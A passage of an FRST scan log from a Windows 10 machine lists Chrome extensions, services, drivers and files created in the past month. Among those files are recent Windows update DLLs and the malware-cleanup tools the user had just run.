CHR HKLM\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files (x86)\Norton 360\Engine\22.8.0.50\Exts\Chrome.crx [2016-10-16]
CHR HKLM-x32\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AMD_RAIDXpert; C:\Program Files (x86)\AMD\RAIDXpert\bin\RAIDXpertService.exe [122880 2009-12-15] (AMD) [File not signed]
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [77128 2015-01-19] (Apple Inc.)
S2 CLKMSVC10_C6F09094; C:\Program Files (x86)\Hewlett-Packard\Media\DVD\Kernel\HDDVD\NavFilter\kmsvc.exe [245232 2010-11-26] (CyberLink)
R2 DokanMounter; C:\Program Files (x86)\Dokan\DokanLibrary\mounter.exe [11776 2012-05-18] () [File not signed]
R2 Garmin Device Interaction Service; C:\Program Files (x86)\Garmin\Device Interaction Service\GarminService.exe [708616 2015-04-08] (Garmin Ltd. or its subsidiaries)
R2 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1163200 2016-01-22] (NVIDIA Corporation)
R2 GoProDeviceDetectionService; C:\Program Files\GoPro\GoPro Desktop App\GoProDeviceDetection.exe [37808 2016-05-12] ()
R2 HP Support Assistant Service; C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\hpsa_service.exe [86528 2012-09-27] (Hewlett-Packard Company) [File not signed]
R2 LightScribeService; c:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe [73728 2010-11-22] (Hewlett-Packard Company) [File not signed]
R2 MySQL; C:\Program Files\MySQL\MySQL Server 5.6\bin\mysqld.exe [12907520 2013-02-01] () [File not signed]
R2 N360; C:\Program Files (x86)\Norton 360\Engine\22.8.0.50\N360.exe [289080 2016-09-23] (Symantec Corporation)
R2 NOBU; C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe [2804568 2010-06-01] (Symantec Corporation)
R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1879488 2016-01-22] (NVIDIA Corporation)
R3 NvStreamNetworkSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe [6308288 2016-01-22] (NVIDIA Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe [4812736 2016-01-22] (NVIDIA Corporation)
R2 pdfcDispatcher; C:\Program Files (x86)\PDF Complete\pdfsvc.exe [1128952 2011-05-06] (PDF Complete Inc)
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [303360 2015-06-24] (Realtek Semiconductor)
R2 Seagate Dashboard Services; C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\Seagate.Dashboard.DASWindowsService.exe [16216 2016-04-05] (Seagate Technology LLC)
R2 Seagate MobileBackup Service; C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\MobileService.exe [143656 2016-04-05] (Seagate Technology LLC)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [347328 2016-07-16] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103720 2016-07-16] (Microsoft Corporation)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 BHDrvx64; C:\Program Files (x86)\Norton 360\NortonData\22.5.0.124\Definitions\BASHDefs\20161027.001\BHDrvx64.sys [1854712 2016-08-18] (Symantec Corporation)
R1 ccSet_N360; C:\WINDOWS\system32\drivers\N360x64\1608000.032\ccSetx64.sys [174328 2016-06-01] (Symantec Corporation)
R2 Dokan; C:\WINDOWS\system32\drivers\dokan.sys [106888 2012-05-18] (Windows ® Win 7 DDK provider)
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [497368 2016-10-08] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [156888 2016-10-08] (Symantec Corporation)
R3 HCW723x; C:\WINDOWS\system32\DRIVERS\HCW723x.sys [1847680 2012-08-17] (Hauppauge Computer Works, Inc.)
S3 hcw85cir; C:\WINDOWS\system32\drivers\hcw85cir3.sys [32768 2009-09-11] (Hauppauge Computer Works, Inc.)
R1 IDSVia64; C:\Program Files (x86)\Norton 360\NortonData\22.5.0.124\Definitions\IPSDefs\20161028.001\IDSvia64.sys [1012952 2016-10-29] (Symantec Corporation)
S0 megasas2i; C:\WINDOWS\System32\drivers\MegaSas2i.sys [64352 2016-10-05] (Avago Technologies)
S3 NetAdapterCx; C:\WINDOWS\System32\drivers\NetAdapterCx.sys [90624 2016-07-16] ()
R2 npf; C:\WINDOWS\system32\drivers\npf.sys [36600 2015-10-12] (Riverbed Technology, Inc.)
R3 nvlddmkm; C:\WINDOWS\System32\DriverStore\FileRepository\nvhdcwu.inf_amd64_16f6c9b501baeb7d\nvlddmkm.sys [13754928 2016-08-27] (NVIDIA Corporation)
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [26560 2016-01-22] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\WINDOWS\system32\drivers\nvvad64v.sys [47760 2015-12-18] (NVIDIA Corporation)
R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [589824 2016-07-16] (Realtek                                            )
R1 SRTSP; C:\WINDOWS\System32\Drivers\N360x64\1608000.032\SRTSP64.SYS [784624 2016-09-23] (Symantec Corporation)
R1 SRTSPX; C:\WINDOWS\system32\drivers\N360x64\1608000.032\SRTSPX64.SYS [49400 2016-09-23] (Symantec Corporation)
R0 SymEFASI; C:\WINDOWS\System32\drivers\N360x64\1608000.032\SYMEFASI64.SYS [1628888 2016-09-23] (Symantec Corporation)
S0 SymELAM; C:\WINDOWS\System32\drivers\N360x64\1608000.032\SymELAM.sys [24192 2015-07-10] (Symantec Corporation)
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT64x86.SYS [100592 2016-10-16] (Symantec Corporation)
R1 SymIRON; C:\WINDOWS\system32\drivers\N360x64\1608000.032\Ironx64.SYS [289520 2016-09-23] (Symantec Corporation)
R1 SymNetS; C:\WINDOWS\System32\Drivers\N360x64\1608000.032\SYMNETS.SYS [567512 2016-09-23] (Symantec Corporation)
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44056 2016-07-16] (Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [290144 2016-07-16] (Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [123232 2016-07-16] (Microsoft Corporation)
U3 idsvc; no ImagePath

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-10-30 18:31 - 2016-10-30 18:33 - 00031269 _____ C:\Users\Harold\Desktop\FRST.txt
2016-10-30 18:31 - 2016-10-30 18:31 - 00000000 ____D C:\FRST
2016-10-30 18:29 - 2016-10-30 18:31 - 02408448 _____ (Farbar) C:\Users\Harold\Desktop\FRST64.exe
2016-10-30 17:33 - 2016-10-30 17:33 - 06761600 _____ (ESET spol. s r.o.) C:\Users\Harold\Downloads\esetonlinescanner_enu.exe
2016-10-30 17:33 - 2016-10-30 17:33 - 00000000 ____D C:\Users\Harold\AppData\Local\ESET
2016-10-30 17:28 - 2016-10-30 17:30 - 02744744 _____ (Symantec Corporation) C:\Users\Harold\Desktop\FixTool64.exe
2016-10-30 17:20 - 2016-10-30 18:03 - 00003810 _____ C:\Users\Harold\Desktop\Rkill.txt
2016-10-30 17:18 - 2016-10-30 17:20 - 02030536 _____ (Bleeping Computer, LLC) C:\Users\Harold\Desktop\iExplore.exe
2016-10-29 14:22 - 2016-10-15 00:48 - 00498952 _____ (Microsoft Corporation) C:\WINDOWS\system32\DolbyDecMFT.dll
2016-10-29 14:22 - 2016-10-15 00:26 - 22224480 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2016-10-29 14:22 - 2016-10-15 00:26 - 04129928 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
2016-10-29 14:22 - 2016-10-15 00:26 - 01990648 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll
2016-10-29 14:22 - 2016-10-15 00:26 - 01472536 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfplat.dll
2016-10-29 14:22 - 2016-10-15 00:26 - 01062480 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll
2016-10-29 14:22 - 2016-10-15 00:22 - 01418312 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
2016-10-29 14:22 - 2016-10-15 00:22 - 00628040 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2016-10-29 14:22 - 2016-10-15 00:15 - 01557808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winmde.dll
2016-10-29 14:22 - 2016-10-15 00:11 - 01263848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
2016-10-29 14:22 - 2016-10-14 23:53 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
2016-10-29 14:22 - 2016-10-14 23:52 - 06285312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2016-10-29 14:22 - 2016-10-14 23:48 - 03778560 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2016-10-29 14:22 - 2016-10-14 23:41 - 12174848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2016-10-29 14:22 - 2016-10-14 23:40 - 13081600 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-10-29 14:22 - 2016-10-14 23:39 - 00982528 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcomm.dll
2016-10-29 14:22 - 2016-10-14 23:38 - 07468032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
2016-10-29 14:22 - 2016-10-14 23:37 - 08075776 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
2016-10-29 14:22 - 2016-10-14 23:36 - 03617792 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2016-10-29 14:22 - 2016-10-14 23:36 - 01880576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Logon.dll
2016-10-29 14:22 - 2016-08-27 01:12 - 00244816 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfps.dll
2016-10-29 14:21 - 2016-10-15 00:51 - 01051112 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2016-10-29 14:21 - 2016-10-15 00:51 - 00894088 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2016-10-29 14:21 - 2016-10-15 00:48 - 07817568 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2016-10-29 14:21 - 2016-10-15 00:48 - 01354320 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2016-10-29 14:21 - 2016-10-15 00:48 - 01173496 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2016-10-29 14:21 - 2016-10-15 00:48 - 00773712 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll
2016-10-29 14:21 - 2016-10-15 00:47 - 01883784 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2016-10-29 14:21 - 2016-10-15 00:37 - 00063328 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dam.sys
2016-10-29 14:21 - 2016-10-15 00:33 - 00455040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DolbyDecMFT.dll
2016-10-29 14:21 - 2016-10-15 00:26 - 04673304 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2016-10-29 14:21 - 2016-10-15 00:26 - 01274712 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2016-10-29 14:21 - 2016-10-15 00:26 - 00811416 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFCaptureEngine.dll
2016-10-29 14:21 - 2016-10-15 00:26 - 00691080 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvproc.dll
2016-10-29 14:21 - 2016-10-15 00:22 - 01608896 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d9.dll
2016-10-29 14:21 - 2016-10-15 00:22 - 01461200 _____ (Microsoft Corporation) C:\WINDOWS\system32\user32.dll
2016-10-29 14:21 - 2016-10-15 00:18 - 00749920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\drvstore.dll
2016-10-29 14:21 - 2016-10-15 00:18 - 00576400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wer.dll
2016-10-29 14:21 - 2016-10-15 00:18 - 00186424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\weretw.dll
2016-10-29 14:21 - 2016-10-15 00:15 - 20969928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2016-10-29 14:21 - 2016-10-15 00:11 - 01424488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d9.dll
2016-10-29 14:21 - 2016-10-15 00:01 - 01631232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Resources.dll
2016-10-29 14:21 - 2016-10-15 00:00 - 00018432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\stdole2.tlb
2016-10-29 14:21 - 2016-10-14 23:58 - 00258560 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\xboxgip.sys
2016-10-29 14:21 - 2016-10-14 23:57 - 00186880 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2016-10-29 14:21 - 2016-10-14 23:56 - 00095232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BluetoothApis.dll
2016-10-29 14:21 - 2016-10-14 23:56 - 00081408 _____ (Microsoft Corporation) C:\WINDOWS\system32\HttpsDataSource.dll
2016-10-29 14:21 - 2016-10-14 23:55 - 00567296 _____ (Microsoft Corporation) C:\WINDOWS\system32\DevicePairing.dll
2016-10-29 14:21 - 2016-10-14 23:55 - 00236544 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Flights.dll
2016-10-29 14:21 - 2016-10-14 23:55 - 00182784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsensorgroup.dll
2016-10-29 14:21 - 2016-10-14 23:54 - 00717312 _____ (Microsoft Corporation) C:\WINDOWS\system32\taskbarcpl.dll
2016-10-29 14:21 - 2016-10-14 23:54 - 00555008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StoreAgent.dll
2016-10-29 14:21 - 2016-10-14 23:54 - 00217088 _____ (Microsoft Corporation) C:\WINDOWS\system32\DevicePairingFolder.dll
2016-10-29 14:21 - 2016-10-14 23:54 - 00211456 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2016-10-29 14:21 - 2016-10-14 23:54 - 00179712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
2016-10-29 14:21 - 2016-10-14 23:54 - 00043520 _____ (Microsoft Corporation) C:\WINDOWS\system32\TpmTasks.dll
2016-10-29 14:21 - 2016-10-14 23:53 - 00744448 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll
2016-10-29 14:21 - 2016-10-14 23:53 - 00240640 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkDesktopSettings.dll
2016-10-29 14:21 - 2016-10-14 23:53 - 00222720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe
2016-10-29 14:21 - 2016-10-14 23:52 - 00274432 _____ (Microsoft Corporation) C:\WINDOWS\system32\ListSvc.dll
2016-10-29 14:21 - 2016-10-14 23:52 - 00163328 _____ (Microsoft Corporation) C:\WINDOWS\system32\autoplay.dll
2016-10-29 14:21 - 2016-10-14 23:50 - 17188352 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2016-10-29 14:21 - 2016-10-14 23:50 - 00509440 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Bluetooth.dll
2016-10-29 14:21 - 2016-10-14 23:50 - 00074752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\updatepolicy.dll
2016-10-29 14:21 - 2016-10-14 23:49 - 09131008 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2016-10-29 14:21 - 2016-10-14 23:49 - 00495104 _____ (Microsoft Corporation) C:\WINDOWS\system32\DataSenseHandlers.dll
2016-10-29 14:21 - 2016-10-14 23:49 - 00187904 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscsvc.dll
2016-10-29 14:21 - 2016-10-14 23:48 - 01323008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_fs.dll
2016-10-29 14:21 - 2016-10-14 23:47 - 01113600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_health.dll
2016-10-29 14:21 - 2016-10-14 23:47 - 00558080 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnprv.dll
2016-10-29 14:21 - 2016-10-14 23:46 - 00471552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.BackgroundMediaPlayback.dll
2016-10-29 14:21 - 2016-10-14 23:45 - 00406016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2016-10-29 14:21 - 2016-10-14 23:44 - 00747008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\RemoteNaturalLanguage.dll
2016-10-29 14:21 - 2016-10-14 23:44 - 00470016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Playback.BackgroundMediaPlayer.dll
2016-10-29 14:21 - 2016-10-14 23:44 - 00465920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LockAppBroker.dll
2016-10-29 14:21 - 2016-10-14 23:44 - 00090112 _____ (Microsoft Corporation) C:\WINDOWS\system32\powercfg.exe
2016-10-29 14:21 - 2016-10-14 23:43 - 00574976 _____ (Microsoft Corporation) C:\WINDOWS\system32\energy.dll
2016-10-29 14:21 - 2016-10-14 23:42 - 00539136 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
2016-10-29 14:21 - 2016-10-14 23:42 - 00459776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Playback.MediaPlayer.dll
2016-10-29 14:21 - 2016-10-14 23:42 - 00090624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2016-10-29 14:21 - 2016-10-14 23:42 - 00089088 _____ (Microsoft Corporation) C:\WINDOWS\system32\asycfilt.dll
2016-10-29 14:21 - 2016-10-14 23:41 - 00940032 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontext.dll
2016-10-29 14:21 - 2016-10-14 23:41 - 00655872 _____ (Microsoft Corporation) C:\WINDOWS\system32\sud.dll
2016-10-29 14:21 - 2016-10-14 23:41 - 00496128 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettings.UserAccountsHandlers.dll
2016-10-29 14:21 - 2016-10-14 23:41 - 00067584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iscsiwmi.dll
2016-10-29 14:21 - 2016-10-14 23:39 - 04749312 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2016-10-29 14:21 - 2016-10-14 23:39 - 03400192 _____ (Microsoft Corporation) C:\WINDOWS\system32\SyncCenter.dll
2016-10-29 14:21 - 2016-10-14 23:39 - 01228288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\usercpl.dll
2016-10-29 14:21 - 2016-10-14 23:39 - 00079360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\asycfilt.dll
2016-10-29 14:21 - 2016-10-14 23:38 - 01993216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2016-10-29 14:21 - 2016-10-14 23:38 - 00913920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.dll
2016-10-29 14:21 - 2016-10-14 23:38 - 00828416 _____ (Microsoft Corporation) C:\WINDOWS\system32\appwiz.cpl
2016-10-29 14:21 - 2016-10-14 23:37 - 02611200 _____ (Microsoft Corporation) C:\WINDOWS\system32\gameux.dll
2016-10-29 14:21 - 2016-10-14 23:37 - 01643008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Speech.dll
2016-10-29 14:21 - 2016-10-14 23:36 - 02512384 _____ (Microsoft Corporation) C:\WINDOWS\system32\themecpl.dll
2016-10-29 14:21 - 2016-10-14 23:36 - 02290176 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2016-10-29 14:21 - 2016-10-14 23:36 - 00629248 _____ (Microsoft Corporation) C:\WINDOWS\system32\hgcpl.dll
2016-10-29 14:21 - 2016-10-14 23:36 - 00347136 _____ (Microsoft Corporation) C:\WINDOWS\system32\Display.dll
2016-10-29 14:21 - 2016-10-14 23:36 - 00338944 _____ (Microsoft Corporation) C:\WINDOWS\system32\fhcpl.dll
2016-10-29 14:21 - 2016-10-14 23:36 - 00081408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cmifw.dll
2016-10-29 14:21 - 2016-10-14 23:35 - 00772608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntshrui.dll
2016-10-29 14:21 - 2016-10-14 23:35 - 00701952 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.Connectivity.dll
2016-10-29 14:21 - 2016-10-14 23:35 - 00391168 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2016-10-29 14:21 - 2016-10-14 23:35 - 00389632 _____ (Microsoft Corporation) C:\WINDOWS\system32\stobject.dll
2016-10-29 14:21 - 2016-10-14 23:34 - 00842240 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntshrui.dll
2016-10-29 14:21 - 2016-10-14 23:31 - 00227328 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ahcache.sys
2016-10-29 14:21 - 2016-09-10 09:21 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\capimg.sys
2016-10-29 14:20 - 2016-10-15 01:11 - 00484584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll
2016-10-29 14:20 - 2016-10-15 00:51 - 02186896 _____ (Microsoft Corporation) C:\WINDOWS\system32\hevcdecoder.dll
2016-10-29 14:20 - 2016-10-15 00:51 - 01637728 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2016-10-29 14:20 - 2016-10-15 00:51 - 01235296 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2016-10-29 14:20 - 2016-10-15 00:51 - 00595296 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2016-10-29 14:20 - 2016-10-15 00:51 - 00590960 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2016-10-29 14:20 - 2016-10-15 00:51 - 00584032 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2016-10-29 14:20 - 2016-10-15 00:51 - 00322912 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2016-10-29 14:20 - 2016-10-15 00:51 - 00283488 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe
2016-10-29 14:20 - 2016-10-15 00:51 - 00232800 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepic.dll
2016-10-29 14:20 - 2016-10-15 00:51 - 00137568 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2016-10-29 14:20 - 2016-10-15 00:51 - 00078688 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
2016-10-29 14:20 - 2016-10-15 00:43 - 01356352 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipUp.exe
2016-10-29 14:20 - 2016-10-15 00:41 - 05622088 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppsvc.exe
2016-10-29 14:20 - 2016-10-15 00:38 - 00500064 _____ (Microsoft Corporation) C:\WINDOWS\system32\pcasvc.dll
2016-10-29 14:20 - 2016-10-15 00:34 - 01969912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hevcdecoder.dll
2016-10-29 14:20 - 2016-10-15 00:32 - 01570680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2016-10-29 14:20 - 2016-10-15 00:31 - 02827864 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d11.dll
2016-10-29 14:20 - 2016-10-15 00:30 - 01851696 _____ (Microsoft Corporation) C:\WINDOWS\system32\crypt32.dll
2016-10-29 14:20 - 2016-10-15 00:30 - 00682816 _____ (Microsoft Corporation) C:\WINDOWS\system32\wer.dll
2016-10-29 14:20 - 2016-10-15 00:30 - 00509280 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storport.sys
2016-10-29 14:20 - 2016-10-15 00:30 - 00341936 _____ (Microsoft Corporation) C:\WINDOWS\system32\wintrust.dll
2016-10-29 14:20 - 2016-10-15 00:30 - 00238056 _____ (Microsoft Corporation) C:\WINDOWS\system32\weretw.dll
2016-10-29 14:20 - 2016-10-15 00:29 - 02913104 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2016-10-29 14:20 - 2016-10-15 00:29 - 01267504 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll
2016-10-29 14:20 - 2016-10-15 00:29 - 00908640 _____ (Microsoft Corporation) C:\WINDOWS\system32\drvstore.dll
2016-10-29 14:20 - 2016-10-15 00:29 - 00079200 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\crashdmp.sys
2016-10-29 14:20 - 2016-10-15 00:26 - 01600632 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppobjs.dll
2016-10-29 14:20 - 2016-10-15 00:26 - 00534096 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEng.dll
2016-10-29 14:20 - 2016-10-15 00:25 - 00882680 _____ (Microsoft Corporation) C:\WINDOWS\system32\EditionUpgradeManagerObj.dll
2016-10-29 14:20 - 2016-10-15 00:25 - 00742704 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppwinob.dll
2016-10-29 14:20 - 2016-10-15 00:21 - 00292872 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpeffects.dll
2016-10-29 14:20 - 2016-10-15 00:19 - 02256592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2016-10-29 14:20 - 2016-10-15 00:15 - 00959112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2016-10-29 14:20 - 2016-10-15 00:14 - 04311736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2016-10-29 14:20 - 2016-10-15 00:11 - 00545944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2016-10-29 14:20 - 2016-10-15 00:10 - 00254656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmpeffects.dll
2016-10-29 14:20 - 2016-10-15 00:06 - 05685760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2016-10-29 14:20 - 2016-10-15 00:05 - 07216640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2016-10-29 14:20 - 2016-10-15 00:00 - 01631232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Resources.dll
2016-10-29 14:20 - 2016-10-15 00:00 - 00048640 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups.dll
2016-10-29 14:20 - 2016-10-14 23:59 - 00272384 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfksproxy.dll
2016-10-29 14:20 - 2016-10-14 23:59 - 00187904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfksproxy.dll
2016-10-29 14:20 - 2016-10-14 23:59 - 00130560 _____ (Microsoft Corporation) C:\WINDOWS\splwow64.exe
2016-10-29 14:20 - 2016-10-14 23:58 - 00040448 _____ (Microsoft Corporation) C:\WINDOWS\system32\efsext.dll
2016-10-29 14:20 - 2016-10-14 23:58 - 00032768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\efsext.dll
2016-10-29 14:20 - 2016-10-14 23:57 - 00217600 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpdxm.dll
2016-10-29 14:20 - 2016-10-14 23:57 - 00175104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmpdxm.dll
2016-10-29 14:20 - 2016-10-14 23:57 - 00039424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dtdump.exe
2016-10-29 14:20 - 2016-10-14 23:56 - 00339968 _____ (Microsoft Corporation) C:\WINDOWS\system32\esentutl.exe
2016-10-29 14:20 - 2016-10-14 23:56 - 00306688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\esentutl.exe
